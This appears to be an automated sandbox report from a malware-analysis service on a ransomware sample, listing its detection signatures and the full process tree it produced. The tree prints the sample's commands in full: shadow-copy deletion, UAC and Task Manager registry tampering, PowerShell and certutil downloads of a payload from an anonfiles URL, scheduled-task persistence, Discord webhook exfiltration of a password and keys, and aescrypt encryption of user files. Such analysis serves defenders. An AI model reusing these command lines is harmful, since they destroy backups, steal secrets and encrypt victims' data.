Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
94s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18/02/2021, 08:52
General
-
Target
RenderGraphics.bin.exe
-
Size
1006KB
-
MD5
46a1769d81d7dcda455f0f05b9b29648
-
SHA1
4d56dffea9d04ee8ed174f1b3328675daf4be7b1
-
SHA256
9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
-
SHA512
8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe
Signatures
-
UAC bypass 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 64 IoCs
-
Modifies extensions of user files 24 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops startup file 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 4 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies registry class 2 IoCs
-
Opens file in notepad (likely ransom note) 4 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f3⤵
- Modifies Control Panel
-
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 53⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh, FakeAccount: BUqT8JXD7pI90Dz17V9SNhEUk8qVQ8khPH2rP, PersonalKey:||RSLgNRKl0oUE979LWZaRUh4MpMfNOD6SN4l0sOa||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRequest.midi.lck" "ReadRequest.midi"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ReadRequest.midi.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchStop.ps1.lck" "WatchStop.ps1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "WatchStop.ps1.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFind.mpg.lck" "ConvertFind.mpg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFind.mpg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairBackup.dib.lck" "RepairBackup.dib"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "RepairBackup.dib.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompressSuspend.MOD.lck" "CompressSuspend.MOD"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "CompressSuspend.MOD.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideRepair.vsdx.lck" "HideRepair.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "HideRepair.vsdx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UndoPush.cab.lck" "UndoPush.cab"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "UndoPush.cab.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountLock.mpp.lck" "MountLock.mpp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "MountLock.mpp.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveConnect.M2T.lck" "ReceiveConnect.M2T"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveConnect.M2T.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockEnter.xps.lck" "BlockEnter.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "BlockEnter.xps.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountMeasure.css.lck" "DismountMeasure.css"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "DismountMeasure.css.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRedo.vbe.lck" "ReadRedo.vbe"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ReadRedo.vbe.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditDebug.fon.lck" "EditDebug.fon"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "EditDebug.fon.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearExit.cfg.lck" "ClearExit.cfg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ClearExit.cfg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StopSelect.dotx.lck" "StopSelect.dotx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "StopSelect.dotx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartInitialize.png.lck" "StartInitialize.png"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "StartInitialize.png.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ShowSearch.gif.lck" "ShowSearch.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ShowSearch.gif.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectMove.emf.lck" "ConnectMove.emf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ConnectMove.emf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupExit.gif.lck" "BackupExit.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "BackupExit.gif.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallLock.xps.lck" "InstallLock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "InstallLock.xps.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestartSearch.bmp.lck" "RestartSearch.bmp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "RestartSearch.bmp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockSearch.svg.lck" "UnblockSearch.svg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "UnblockSearch.svg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmAdd.jpeg.lck" "ConfirmAdd.jpeg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmAdd.jpeg.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat4⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt5⤵
- Opens file in notepad (likely ransom note)
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.ini.lck" "ntuser.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "deployment.properties.lck" "deployment.properties"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "deployment.properties.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG1.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT.lck" "NTUSER.DAT"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Admin.contact.lck" "Admin.contact"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Admin.contact.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Pay2Decrypt54.txt.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
